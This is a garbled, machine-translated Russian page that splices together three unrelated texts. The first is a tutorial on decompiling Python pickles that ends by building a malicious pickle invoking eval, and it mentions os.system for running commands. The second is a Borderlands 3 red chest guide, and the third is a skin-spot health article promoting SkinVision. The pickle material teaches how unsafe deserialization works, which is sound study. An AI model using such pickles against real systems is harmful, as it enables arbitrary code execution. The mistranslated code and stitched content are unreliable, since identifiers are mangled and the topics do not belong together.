70: b СТРОИТЬ
71:. СТОП
самый высокий протокол среди кодов операций = 0
Вы заметите, что это в основном оригинал со всеми удаленными кодами операций PUT
.
Это сводит нас к 10 инструкциям, которые нам нужно понять.Через минуту мы рассмотрим их один за другим и вручную «декомпилируем» их в код Python.
Во время распаковки эти коды операций обычно интерпретируются так называемой машиной для рассола (PM). Любой рассол — это, по сути, программа, которая выполняется на PM во многом так же, как скомпилированный код Java выполняется на виртуальной машине Java (JVM). Чтобы декомпилировать наш код pickle, нам нужно сначала немного понять, как работает PM.
PM имеет две области, где данные могут храниться и с которыми можно взаимодействовать: памятка и стопка.Памятка предназначена для длительного хранения и может рассматриваться как словарь Python, отображающий целые числа на объекты. Стек похож на список Python, с которым многие операции взаимодействуют, добавляя или извлекая элементы. Мы можем эмулировать эти две области данных в Python следующим образом.
# долговременная память / хранение PM
памятка = {}
# стек PM, с которым взаимодействует большинство кодов операций
стек = []
Во время распаковки PM считывает программу пакетирования и последовательно выполняет каждую инструкцию.Он завершается при достижении кода операции STOP
; любой объект, находящийся на вершине стека в этот момент, является окончательным результатом распаковки.
Используя нашу эмулированную память memo
и stack
, давайте попробуем перевести наш рассол на Python… инструкция за инструкцией.
GLOBAL помещает в стек либо класс, либо функцию, учитывая ее модуль и имя в качестве аргументов. Обратите внимание, что сообщение дизассемблера здесь немного вводит в заблуждение, потому что
copy_reg
был переименован вcopyreg
в Python 3.# Помещаем глобальный объект (module. attr) в стек. # 0: c ГЛОБАЛЬНЫЙ 'copy_reg _reconstructor' из copyreg import _reconstructor stack.append (_reconstructor)
MARK помещает в стек специальный объект
mark,
, чтобы мы могли позже использовать его для определения части стека. Мы просто будем использовать здесь строку «MARK», чтобы представить объект марки# Поместите объект с меткой в стопку. # 25: (ОТМЕТЬ стек.добавить ('ОТМЕТКА')
GLOBAL снова, но на этот раз модуль
__main__
, поэтому нам не нужно выполнять импорт# Помещаем глобальный объект (module.attr) в стек. # 26: c ГЛОБАЛЬНАЯ '__main__ Bomb' stack.append (Бомба)
GLOBAL снова, нам также не нужно явно импортировать
объект
.# Помещаем глобальный объект (module.attr) в стек. # 41: c GLOBAL '__builtin__ object' стек.добавить (объект)
NONE просто помещает
None
в стек.# Не помещать в стек. # 61: НЕТ stack.append (Нет)
TUPLE немного сложнее. Помните, как мы ранее добавляли эту отметку в стопку? Эта операция удалит все из стека, начиная с отметки «MARK», и поместит это в кортеж. Затем он удалит отметку «MARK» и заменит ее кортежем.
# Строит кортеж из самого верхнего среза стека после markobject.# 62: t ТУПЛ (ОТМЕТЬТЕ на 28) last_mark_index = len (стек) - 1 - стек [:: - 1] .index ('MARK') mark_tuple = кортеж (стек [last_mark_index + 1:]) стек = стек [: last_mark_index] + [mark_tuple]
Было бы полезно увидеть, как это изменяет стек.
# стек перед операцией TUPLE: [
, 'MARK', __main __. Bomb, object, None] # стек после операции TUPLE: [<функция copyreg._reconstructor>, (__main__.Бомба, объект, Нет)] REDUCE удаляет последние две вещи из стека. Затем он вызывает объект, который был предпоследним, используя позиционное расширение объекта, который был последним, и помещает результат в стек. Это довольно сложно, но это легко понять в коде.
# Выталкивает объект, созданный из вызываемого кортежа и аргумента. Татуировка # 63 args = stack.pop () callable = stack.pop () stack.append (вызываемый (* аргументы))
UNICODE просто помещает строку Unicode в стек (и особенно красивую строку Unicode!).
# Отправить строковый объект Python Unicode. # 64: V UNICODE 'Evan' stack.append (у'Эван)
BUILD извлекает из стека последнее, а затем передает его в качестве аргумента в
__setstate __ ()
для нового последнего элемента в стеке.# Завершить построение объекта с помощью __setstate__ или dict update. Татуировка # 70 arg = stack.pop () стек [-1] .__ setstate __ (аргумент)
STOP просто означает, что все, что находится наверху стека, является нашим окончательным результатом.
# Остановите расстыковочную машину. # 71:. СТОП unpickled_bomb = стек [-1]
Уф, у нас получилось!
Я не уверен, что наш код является наиболее подходящим для Pythonic … но он действительно имитирует то, как PM будет делать что-то.
Вы могли заметить, что мы никогда не использовали memo
.
Помните все те коды операций PUT
, которые были удалены с помощью pickletools.optimize ()
?
Это могло быть связано с взаимодействием с memo
, но на самом деле они не требовались в этом простом примере.
Мы здесь уже закончили, но давайте попробуем немного упростить код, чтобы сделать то, что он делает, более очевидным.
На самом деле здесь есть только три операции, где происходит что-либо, кроме перетасовки данных: импорт _reconstructor
в инструкции 1, вызов _reconstructor
в инструкции 7 и вызов __setstate __ ()
в инструкции 9.
Если мы управляем перетасовкой данных в голове, мы сможем выразить это всего в трех строках Python.
# Инструкция 1, куда был импортирован _reconstructor
из copyreg import _reconstructor
# Инструкция 7, где был вызван `_reconstructor`
unpickled_bomb = _reconstructor (cls = Bomb, base = object, state = None)
# Инструкция 9, где был вызван `__setstate__`
unpickled_bomb .__ setstate __ ('Эван')
Заглянув внутрь исходного кода для copyreg._reconstructor ()
, можно увидеть, что он в основном просто вызывает объект .__ new __ (Bomb)
.
Используя этот факт, мы можем еще больше упростить это до двух строк.
unpickled_bomb = object .__ new __ (Бомба)
unpickled_bomb .__ setstate __ ('Эван')
Поздравляю, вы только что декомпилировали рассол.
Я не специалист по рассолу, но на данный момент я думаю, что вижу основную картину того, как можно создать вредоносный рассол.
Код операции GLOBAL
можно использовать для импорта любой функции, которую мы хотим — os.system
и __builtin __. Eval
кажутся очаровательными кандидатами, — а затем REDUCE
можно использовать для выполнения с произвольным аргументом.Кроме … подожди, что это?
Если
not isinstance (callable, type)
,REDUCE
жалуется, если вызываемый объект не был зарегистрирован с помощью файла safe_constructors dict модуля copyreg или вызываемый объект не имеет магического атрибута__safe_for_unpickling__
с истинным значением. Я не знаю, почему он это делает, но я наверняка видел эту жалобу достаточно часто, хотя мне не хотелось <подмигивать>.
Подмигнуть.
Подмигнуть.
Документация pickletools, кажется, предполагает, что только вызываемые объекты из белого списка могут быть выполнены REDUCE
.Это меня на минуту обеспокоило, когда я впервые прочитал это, но после поиска в Google «safe_constructors» я быстро нашел PEP 307 от 2003 года.
В предыдущих версиях Python при распаковке выполнялась «проверка безопасности» для определенных операций, с отказом в вызове функций или конструкторов, которые не были помечены как «безопасные для распаковки» либо с помощью атрибута
__safe_for_unpickling__
, установленного на 1, либо с помощью будучи зарегистрированным в глобальном реестре,copy_reg.safe_constructors
.Эта функция дает ложное чувство безопасности: никто никогда не проводил необходимый обширный аудит кода, чтобы доказать, что распаковка ненадежных солений не может вызвать нежелательный код, и на самом деле ошибки в модуле pickle.py Python 2.2 позволяют легко их обойти. Меры безопасности.
Мы твердо убеждены, что в Интернете лучше знать, что вы используете небезопасный протокол, чем доверять протоколу, реализация которого не была тщательно проверена.Даже высококачественные реализации широко используемых протоколов обычно оказываются ошибочными; Реализация pickle в Python просто не может дать таких гарантий без гораздо больших временных затрат. Поэтому, начиная с Python 2.3, все проверки безопасности при распаковке официально удалены и заменены этим предупреждением:
Предупреждение: Не извлекайте данные, полученные из ненадежного или не прошедшего проверку подлинности источника.
Привет тьма, наш старый друг. Здесь все началось.
Итак, вот и все, у нас есть все наши ключевые ингредиенты, и нет ложного чувства безопасности, чтобы защитить от того, что мы собираемся сделать. Начнем с написания нашей бомбы на ассемблере:
# добавляем функцию в стек для выполнения произвольного python
ГЛОБАЛЬНЫЙ '__builtin__ eval'
# отмечаем начало нашего кортежа args
ОТМЕТКА
# добавляем в стек код Python, который мы хотим выполнить
UNICODE 'print ("Bang! From, Evan.")'
# превратить этот код в кортеж, чтобы его можно было проанализировать с помощью REDUCE
ТУПЛ
# вызываем eval () с нашим кодом Python в качестве аргумента
УМЕНЬШИТЬ
# STOP должен быть действительным кодом PM
СТОП
Теперь, чтобы преобразовать это в настоящий рассол, нам нужно заменить каждый код операции на соответствующий код ASCII: c
для GLOBAL
, (
для MARK
, V
для UNICODE
, t
для TUPLE
, R
для REDUCE,
и .
для STOP
.
Обратите внимание, что это те же символы, которые были слева от кодов операций в выходных данных pickletools.dis ()
из предыдущего.
Аргументы анализируются после каждого кода операции в соответствии с комбинацией разграничения позиции и новой строки.
Каждый аргумент помещается либо непосредственно после соответствующего ему кода операции, либо после предыдущего аргумента, и он читается непрерывно, пока не встретится символ новой строки.
Таким образом, перевод нашей сборки в машинный код pickle дает нам:
c__builtin__
оценка
(Впринт ("Бац! От, Эван.")
tR.
Finaaaallly, мы можем попробовать это:
# Беги ко мне домой!
# Я в безопасности, обещаю!
pickled_bomb = b'c__builtin __ \ neval \ n (Vprint ("Bang! From, Evan.") \ ntR. '
pickle.loads (маринованная_bomb)
и…
Взрыв! От Эвана.
Я знаю, что у вас нет причин верить мне, но это сработало с первой попытки.
Отсюда довольно легко увидеть, как кто-то может придумать более злонамеренный аргумент для eval ()
.PM можно заставить делать буквально все, что может делать код Python, включая выполнение системных команд через os.system ()
.
Я решил узнать, как приготовить опасный рассол, и случайно узнал, как при этом работают соленья.
Должен сказать, я нашел всю эту штуку с Pickle Machine довольно забавной.
Исходный код pickletools
очень помог в этом разобраться, и я настоятельно рекомендую его, если вы хотите узнать больше о протоколе pickle или PM.
Если вам когда-нибудь понадобится кто-то, кто использует уязвимый протокол для внедрения вредоносного шеллкода, не стесняйтесь обращаться к нам. Шучу … мы занимаемся данными. Но если вам нужна помощь с парсингом веб-страниц, машинным обучением или еще чем-нибудь, что программисты могут сделать за деньги, тогда серьезно свяжитесь с нами!
Borderlands 3 Red Chests Guide — Расположение красных сундуков, как открыть
В различных локациях вселенной Borderlands 3 вы можете встретить Красные сундуки.Эти сундуки содержат некоторые уникальные и полезные предметы коллекционирования, и все они стоят того, чтобы их найти. Вот в чем вам поможет это руководство.
Borderlands 3 красных сундука
Снаряжение, которое можно найти в этих сундуках, может иметь эпическую или легендарную редкость, а это означает, что их получение стоит времени и усилий.
Тем не менее, их не нужно собирать — это предметы коллекционирования, которые игрок может выследить, не привязанные к какой-либо внутриигровой миссии, и для этого нет никаких достижений (однако вы действительно хотите собирать их, если вы хотите пройти игру на 100%).
В частности, можно легко пропустить два сундука, поскольку они являются наградой за выполнение необязательной цели.
Если вы упустите возможность выполнить это конкретное задание, вы можете присоединиться к игре друга (того, кто выполнил эту задачу) и получить оттуда Красные сундуки.
Эти сундуки видны на карте, однако, если вы открыли один из них, при просмотре орбиты его положение будет выделено. Это поможет вам отслеживать каждый найденный вами сундук.
Интересный факт, вы действительно можете вернуться к уже открытому Красному сундуку и открыть его снова; это можно сделать, быстро переместившись на другую карту, а затем вернувшись в исходное местоположение. Отличный способ собрать довольно ценные предметы коллекционирования.
Всего 57 красных сундуков, разбросанных по 5 планетам, это руководство поможет вам найти каждую из них.
Пандора
Всего на Пандоре доступно 18 красных сундуков. На этой планете есть 10 подобластей, и мы рассмотрим каждую по очереди.
Засуха
Сундук № 1 : Это один из 2 сундуков, которые игрок может легко пропустить. . Во время побочного квеста «Мощные связи» выполните дополнительное задание «Человеческий позвоночник», и вам будет предоставлен доступ в подвал. Это появляется, когда вы завершаете миссию; некоторые половицы откроются за красными автоматами «Пушки», сундук в подвале.
Сундук № 2 : Где-то в засухе вы встретите большое вражеское строение.Убейте всех врагов, которые встретятся на вашем пути, и начните подниматься по строению. Вам нужен желтый провод, разрезанный пополам. Выше места перерезания провода вы увидите 2 красные мишени; стрелять в них обоих. Это активирует люк, следуйте по желтому проводу, чтобы добраться до люка, и упадите. Вы найдете там сундук.
Сундук № 3 : Это самый простой для поиска. Он находится на крыше гаража Элли. Просто заберитесь сбоку, и вы сразу найдете его.
Утес Вознесения
Сундук № 1 : Этот сундук можно найти только во время побочного квеста «Pandora’s Next Top Mouthpiece». После того, как вы победите новый мундштук, вам будет предложено найти секретный тайник; сундук там.
Дьявольская бритва
Сундук № 1 : В Devil’s Razor вы, вероятно, встретите большое здание, заполненное окаменевшими людьми. Вы стремитесь достичь вершины этой конструкции, потому что там находится сундук.
Сундук № 2 : Найдите место, напоминающее нефтеперерабатывающий завод. Это может быть довольно сложно найти, поскольку вам нужно подняться на несколько строительных лесов, пересечь большие трубы и попытаться найти его за одной из многих круглых структур. Если вы внимательно посмотрите на карту, то увидите, что находитесь в огромной круглой области. Изучите свою карту, и вы увидите, что рядом с круглой областью есть горизонтальная область, сундук расположен рядом с этой горизонтальной областью, которая выходит наружу, на краю круглой области.
Сплинтерлендс
Сундук № 1 : В Splinterlands найдите станцию Catch-a-Ride, на которую вы забираетесь сбоку. Сундук находится на крыше.
Сундук № 2 : Это может оказаться сложной задачей. Вам нужно попасть на американские горки и за одну поездку расстрелять все красные мишени. Если у вас получится, электрическая дверь откроется там, где вы впервые оказались на американских горках. Сундук можно найти там.
Плотоядное животное
Сундук № 1 : Его можно найти в зоне трейлера. Вам нужно забраться на трейлеры (уничтожая врагов по пути) и двигаться вперед, пока не дойдете до моста (вы поймете, что находитесь там, когда увидите знак с надписью «Убейте нас»). Перейдите через мост и держитесь левой стороны, пока не увидите сундук.
Сундук № 2 : Ищите гараж с дверью ставня почти полностью опущенной. Присядьте и пройдите через дверь, и вы доберетесь до сундука.
Кишки хищника
Сундук № 1 : Этого легко не заметить. В области с большими вращающимися механизмами вам нужно подняться наверх и ближе к концу области. Посмотрите в противоположном направлении, и вы увидите мост с огнеметами, но перед этим вы увидите трубу с пробитым отверстием, выбрасывающим воздух. Встаньте на трубу и используйте воздух, чтобы подняться вверх. Это поможет вам добраться до платформы сундуком.
Сундук № 2 : Это нужно сделать перед тем, как попасть в лифт, чтобы сразиться с Агонизатором.Рядом с входом в лифт небольшая пропасть, за которой есть площадка; прыгай туда. Поверните направо и в темном углу вы увидите сундук.
Дыра Конрада
Сундук № 1 : Его можно найти только после завершения побочного задания «Конец детства», поэтому не забудьте остаться после его завершения. В области, специально предназначенной для этой миссии, выстрелите в две красные цели, которые включат питание. Следуйте по желтым кабелям на земле, они приведут вас к открывшейся двери люка.Сундук выше этого.
Шрам от пескоструйной обработки
Сундук № 1 : Его можно найти во вражеском лагере возле выхода из «Бритвы дьявола». Идите в одно из боковых строений, там большие котлы; сундук рядом с одним.
Собор Богов-близнецов
Сундук № 1 : Идите ко входу в зону «Дети Убежища» и поверните направо. Заберитесь на платформу, и вы увидите забаррикадированный дверной проем, пройдите через него в рукопашную и продолжайте двигаться вперед.Вы увидите лестницу, ведущую вниз, пройдите туда, и вы увидите сундук.
Сундук # 2 : Идите туда, где происходит испытание «Цель возможностей» Сокрушающей челюсти (Эридиевый шлюз), и, победив существо, спуститесь в люк, из которого он появился.
Разлом разрушителя
Сундуки №1 и 2 : Последние 2 сундука в этом мире можно найти после победы над финальным боссом. Внутри хранилища вы найдете два сундука напротив друг друга.
Прометея
Всего в этом мире 15 красных сундуков, разбросанных по 7 локациям.
Окраины меридианов
Сундук № 1 : В этой области вы встретите большую конструкцию, состоящую из множества трейлеров, транспортных средств и большого количества металла. На западной стороне вы увидите лифт. Зайдите внутрь и нажмите зеленую кнопку. Поднявшись наверх, выйдите из лифта и держитесь левой стороны, спуститесь по лестнице и найдите комнату, интерьер которой ярко-фиолетовый; сундук там.
Меридиан Метроплекс
Сундук № 2 : Трудно пропустить этот сундук, когда вы сталкиваетесь во время миссии «Враждебный захват».
Сундук № 3 : Этот сундук можно найти после победы над Гигамозгом. Как только вы его победите, слева откроется дверь.
Сундук № 4 : Можно найти там же, где находится одна из мертвых капель Тифона. Сравните карту, приведенную выше, с картой, указывающей местонахождение Dead Drop, и вы узнаете, где он находится.
Lectra City
Это можно сделать во время побочного задания «Убить Киллаволта»
Сундук № 5 : В районе гавани, напротив «Труда», стоит большой подъемный кран. Заберитесь на кран, чтобы найти сундук.
Сундук № 6 : В западной части локации сундук можно найти на виду рядом со зданием с красными фонарями на крыльце.
Сундук № 7 : После того, как вы победите Киллаволта, вернитесь в комнату, которая предшествует области битвы с боссом.В этой комнате откроется дверь, которая приведет вас к сундуку.
Skywell-27
Сундук # 8 : Ищите игровой автомат Мокси в Яме удовольствий Катагава. Это потайная зона в правой части здания, вы ищете небольшую яму.
Сундук # 9 : Победив Катагаву Болла, направляйтесь к Пункту быстрого перемещения Лазерной Контрольной комнаты, сундук находится рядом с ней.
Атлас HQ
Сундук № 10 : После того, как вы закончите с Катагавой-младшим.сразитесь с боссом, пройдите в комнату, где находится точка быстрого перемещения Atlas HQ Rooftop; сундук там.
Сундук № 11 : Он находится в той же области, что и сундук выше; за лифтом в соседней комнате.
Сундук № 12 : Его можно найти в конце побочного задания «Ratch’d Up». Во время миссии вы в конечном итоге получите доступ к лаборатории, внутри вы должны пройти на самый нижний уровень лаборатории. Сундук находится в последней комнате.
Неоновая артериальная
Сундук № 13 : Идите в зону с большими неоновыми вывесками «Билеты» наверху. Здесь много магазинов, ищите тот, в котором есть грили. Внутри этого магазина вы найдете сундук.
Забытая базилика
Сундуки № 14 и 15 : После того, как вы победите Rampager, вам будет предоставлен доступ в хранилище. Оба сундука внутри.
Афины
В этом месте наименьшее количество сундуков — всего два, но получить один может оказаться довольно сложной задачей.
Сундук # 1 : Это один из 2 сундуков, которые легко пропустить . Этот сундук можно получить только во время побочного квеста «Святые духи». Вы должны выполнить все задачи этого квеста, чтобы получить доступ к комнате с сундуком.
Сундук # 2 : После того, как вы победите капитана Траунта, идите в то место, где вы сражались с ним; сундук там.
Иден-6
Всего в 6 подобластях можно найти 15 сундуков.Теперь, когда вы нашли два сундука, которые можно легко смешать, вы можете собрать остальные на досуге.
Водохранилище
Сундук № 1 : Этот сундук можно найти во время основной миссии «Guns of Reliance». Идите в лагерь опоры, сундук в сарае с оружием.
Сундук № 2 : Во время основной миссии «Guns of Reliance» вы в конечном итоге окажетесь в Fort Sunshine. Внутри лесопилки, как часть миссии, вам придется прыгнуть на стопку бревен, которые транспортируют на лесопилку.Когда вам скажут спрыгнуть, сделайте это. Сразитесь с врагами и найдите небольшую комнату с сундуком внутри.
Сундук № 3 : В том месте, где вы собираетесь охотиться на Чанк Стомп в рамках Легендарной охоты.
Наковальня
Сундук № 4 : Его можно найти в Центре безопасности. Поднимитесь наверх и войдите в вентиляционное отверстие; поверните направо и наткнетесь на генератор. Включите его — желтый кабель будет электрифицирован, следуйте за кабелем, и вы увидите, что теперь у вас есть доступ к ранее запертой комнате.
Сундук № 5 : Во время испытания экипажа «Цель возможностей» — победите существо и поднимитесь по лестнице с правой стороны до самого верха. Вы увидите комнату с красным интерьером. Сундук есть.
Сундук # 6 : В комнате сразу после битвы с боссом Стражей; там же, что и точка быстрого перемещения Ultramax.
Усадьба Якобса
Сундук № 7 : Во время побочного задания «Ведьмин отвар» вам открывается доступ в совершенно новую область.В этой новой области сундук можно найти посреди болота.
Сундук # 8 : Победите Билли, Помазанника, Обретенного в Театре, и пройдите уровень как обычно, но не до самого Грота! Сундук находится на пути между Театром и Гротом.
Прожорливый навес
Сундук № 9 : Идите к Заставе Науки, там будет двухэтажный дом с мхом на крыше. На верхнем этаже есть красная цель, которую можно увидеть через окно.Вы должны выстрелить в него, получив доступ к дому и сундуку.
Сундук № 10 : Есть большой комплекс зданий, в котором вы должны искать склад боеприпасов рядом с торговыми автоматами. Заберитесь на выступ позади них, и вы заметите красную цель в начале желтого кабеля; выстрелите в него и следуйте по кабелю к месту назначения.
Сундук № 11 : Рядом с Мостом драгоценностей точка быстрого перемещения, место, куда вы можете попасть только после победы над GenIVIV.
Амбермайр
Сундук № 12 : Рядом с Багровым радио, которое спрятано в этой области. Тем, кто не знает, как туда добраться, поищите большую башню (в основном штабель трейлеров с краном наверху) и начните подниматься на нее сбоку. Сундук находится у основания подъемного крана.
Сундук № 13 : Довольно неприметный, этот можно найти на территории, похожей на ферму, рядом с ракетой. Найдите деревянную лестницу, под ней будет небольшая щель, через которую вы сможете пройти; присядьте и пройдите через него, чтобы добраться до сундука.
Сундук # 14 : В Big Rig Тига вы должны взобраться на подъемный кран; платформа рядом с одним из динамиков.
Подвалы Черной бочки
Сундук № 15 : Можно найти в комнате 5 Подвалов, на балконе. В этой области вы увидите стопку деревянных ящиков, используйте их, чтобы добраться до балкона.
Некротафейо
Последние 7 красных сундуков можно найти в этой части карты, разбросанных в общей сложности на 7 локациях.Ничто из этого не является слишком сложным для обнаружения.
Край запустения
Сундук № 1 : Во время побочного задания «Гомеопатология» вам дадут указание открыть ящик спокойствия; это тот сундук, который вы ищете. Пока вы выполните эту миссию, вы получите Красный сундук.
Сундук № 2 : Во время побочного задания «Плохие вибрации» вам будет предложено использовать пар, чтобы подняться на Quietus Pike, сделать это и использовать пар, чтобы подняться на платформу наверху. .
Сундук № 3 : В конце концов вы наткнетесь на место с каменными столбами, оно будет залито темно-красным цветом. Сундук находится на вершине одной из каменных колонн.
Руины тазендирского оленя
Сундук № 4 : Вы попадете на территорию с большими деревьями. Кора одного из этих деревьев будет отслаиваться, вы можете запрыгнуть на кору и перебраться на другую сторону. Вы увидите порог, обшитый деревом, используйте его, чтобы перейти на другую сторону; грудь впереди.
Сундук № 5 : Когда вы выполняете Sylestro и Atomic Targets of Opportunity of Challenge, вы найдете сундук в той же области.
Костер звезд
Сундук № 6 : В области с несколькими каменными значками вы начнете подниматься по уступам. Вместо того, чтобы идти своим путем, посмотрите направо и найдите лазейку. Как только вы найдете его, подойдите к нему, и вы увидите сундук.
Сундук № 7 : В зоне мокрой стены с левой стороны вы увидите мини-водопад.Пройдите через водопад, и вы увидите последний Красный сундук.
Красные пятна на коже, но не чешутся?
В этой статье мы внимательно рассмотрим некоторые из наиболее частых причин появления не зудящих красных пятен на коже. Незудящее пятно может сильно отличаться от того, что мы считаем «нормальной» сыпью или вспышкой, и часто может возникать по той же причине, что и зудящее пятно.
Познакомьтесь с потенциальными триггерами не вызывающих зуд красных пятен ниже и регулярно проверяйте свою кожу.
Используйте SkinVision, чтобы проверить свою кожу на наличие признаков рака кожи и мгновенно получить указание на риск.
Распространенные причины появления красных пятен на коже без зуда
Существует несколько потенциальных причин появления на коже не вызывающих зуд красных пятен.
1) Родинки
Родинки — это цветные пятна на нашей коже, которые присутствуют при рождении или появляются вскоре после него. Иногда эти пятна красные. В этом случае это обычно сосудистая родинка .Эти типы родинок вызывают аномальные кровеносные сосуды кожи .
2) Акне
Угри — это широко распространенное заболевание кожи, которое варьируется от легкой до тяжелой. Обычно это проявляется в виде шишек на коже, которые часто становятся красными или опухшими.
3) Ангиомы
Ангиомы — это кожные новообразования, которые могут возникать на любом участке тела. Они вызваны кровеносными сосудами, которые слиплись вместе и выглядят как красные куполообразные бугорки, также известные как папулы, на или под кожей .
4) Волосный кератоз
Волосный кератоз — это безвредное кожное заболевание, которое возникает из-за чрезмерной выработки белка кератина . Он вызывает небольшие твердые бугорки вокруг волосяных фолликулов, особенно на бедрах, ягодицах и плечах .
5) Кипит
Фурункул — это инфекция кожи волосяного фолликула или сальной железы. Обычно это плотная красная шишка, часто заполненная гноем. Фурункулы обычно проходят после того, как они лопнут и вытечет гной или жидкость .
Подробнее: Ранние симптомы меланомы и их определение
6) Аллергическая реакция
Одна из самых частых причин красных пятен на коже — высыпания, возникающие в результате аллергических реакций. Реакция может быть на пищу, пыльцу или другие аллергены в воздухе, косметику, средства по уходу за кожей, стиральный порошок или целый ряд других раздражителей. Врач может провести патч-тест, чтобы определить, какие аллергены вызывают реакцию на вашей коже .
7) Тепловая сыпь
Тепловая сыпь возникает в результате попадания пота в забитые поры и проявляется в виде красных бугорков, которые могут или не могут ощущаться как покалывание или зуд. Этот тип сыпи является обычным явлением в жаркую влажную погоду и обычно проходит, когда температура кожи снижается до .
8) Розовый лишай
Розовый лишай — это сыпь, вызванная вирусом, которая обычно длится от шести до двенадцати недель. Он состоит из более крупного «материнского» участка, окруженного более мелкими участками.Эта сыпь обычно розового или красного цвета, может быть приподнятой и чешуйчатой.
9) Интертриго
Интертриго — это сыпь, которая возникает в складках кожи. Обычно он проявляется в подмышечных впадинах, под грудью, на туловище или на гениталиях. Это обычно встречается у людей с избыточным весом или ожирением и возникает в результате трения, повышенной температуры и влажности, а также другого раздражения кожи.
10) Дерматофиброма
Дерматофиброма — это узелок, который обычно развивается на голенях у женщин, хотя он также может возникать у мужчин и на любом участке тела.Эти новообразования красного или коричневого цвета, не являются злокачественными и обычно появляются в количестве, кратном .
См. Нашу библиотеку: Фотографии рака кожи
11) Раздражающий контактный дерматит
Раздражающий контактный дерматит — это еще один термин, обозначающий сыпь, вызванную раздражением каким-либо веществом. В отличие от сыпи, вызванной аллергической реакцией, она не вызвана раздражителем иммунной системы. Напротив, это обычно вызвано многократным воздействием легких раздражителей, таких как мыло, детергенты, кислота или щелочь .
12) Петехии / пятна крови
Петехии, или пятна крови, представляют собой круглые красные пятна, которые возникают в результате прорыва крошечных кровеносных сосудов, называемых капиллярами, под кожей. Они плоские на ощупь и иногда могут выглядеть как сыпь. Они вызваны различными причинами, такими как травмы, растяжение и солнечные ожоги .
13) Ульи
Крапивница — это сыпь в виде красных шишек, внезапно возникающая на коже, обычно в результате действия аллергена.Обычно они длятся несколько часов или дней, прежде чем спадут .
14) Розацеа
Розацеа — хроническое заболевание кожи, вызывающее крошечные красные прыщики и покраснение кожи. Обычно это происходит только на лице, где на поверхности кожи появляются мелкие кровеносные сосуды .
15) Укусы насекомых
Укусы насекомых обычно выглядят как круглые шишки, которые могут вызывать зуд, а могут и не опухать. Комары — частые виновники, но если вы просыпаетесь с небольшими красными шишками, это может быть признаком постельных клопов .
Подробнее на: Распространенные поражения кожи
Менее распространенные причины появления красных пятен без зуда
Хотя встречаются реже, другие серьезные заболевания также могут проявляться в виде красной сыпи, пятен, пятен или шишек на коже, в том числе:
· Краснуха
· Импетиго
· Нарушения свертываемости крови
· Волчанка
· Болезнь Кавасаки
· Синдром Рамзи Ханта
· Ветряная оспа
· Генитальный герпес
· Остроконечные кондиломы
· MRSA (стафилококковая инфекция)
· Чесоточная лихорадка
· Scabis79
· Болезнь Лайма
Белые пятна на коже от солнечных лучей: опасны ли они?
Красные пятна и рак кожи
Рак кожи, от меланомы до базальноклеточного рака, также может проявляться в виде красных пятен, чешуйчатых бляшек или родинок на коже.Обязательно проконсультируйтесь с врачом, если вы не уверены в наличии на своем теле шишки или пятна, которое:
· не исчезнет со временем
· меняется или ухудшается
· появляется внезапно, без каких-либо очевидных причин
· выглядит подозрительно и вызывает у вас беспокойство.
Сделайте умную проверку с помощью SkinVision сейчас и получите мгновенное указание на риск.
Ранняя диагностика рака кожи
Наиболее опасными видами кожных поражений являются родинки рака кожи.Нормальные родинки естественны и не причиняют вреда. Но они всегда представляют определенный риск: изменение цвета, размера или формы родинки может быть опасным из-за риска рака кожи.
Обязательно проверьте родинку, если вы ей не доверяете. Быстрый, простой и надежный способ сделать это для всей вашей семьи — воспользоваться услугой SkinVision. 1,3 миллиона человек во всем мире доверяют SkinVision, чтобы помочь им следить за своей кожей, не выходя из дома.